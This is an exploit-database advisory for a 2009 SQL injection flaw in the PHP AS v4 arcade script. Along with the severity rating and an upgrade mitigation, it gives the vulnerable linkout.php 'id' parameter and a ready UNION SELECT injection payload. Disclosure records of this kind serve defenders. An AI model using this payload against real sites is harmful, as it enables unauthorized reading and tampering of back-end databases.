PHP AS v4

vendor:

PHP AS v4

by:

MizoZ [EvilWay Team]

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: PHP AS v4

Affected Version From: 4.0

Affected Version To: 4.0

Patch Exists: YES

Related CWE: N/A

CPE: a:phparcadescript:php_as_v4

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

PHP AS v4 is prone to an SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to manipulate SQL queries to view, add, modify or delete records in the back-end database.

Mitigation:

Upgrade to the latest version of PHP AS v4

Source

Exploit-DB raw data:

----------------------------------------------------------------------------------------------------
  Name : PHP AS v4
  Site : http://www.phparcadescript.com/

----------------------------------------------------------------------------------------------------
 
  Found By : MizoZ [EvilWay Team]
  Made in  : Morocco
  Contact  : mizoz[at]9[dot]cn
  Greetz   : Moudi , Zuka , JIKO , opt!x , All friends
  Website : BlackArea.org (Coming Soon)
----------------------------------------------------------------------------------------------------

SQL Injection linkout.php (GET : id) :
[HOST]/[PATH]/linkout.php?id=[SQL CODE]

SQL CODE : null+union+select+1,2,3,4,5,6,7,8,9,10,11--

----------------------------------------------------------------------------------------------------

# milw0rm.com [2009-07-28]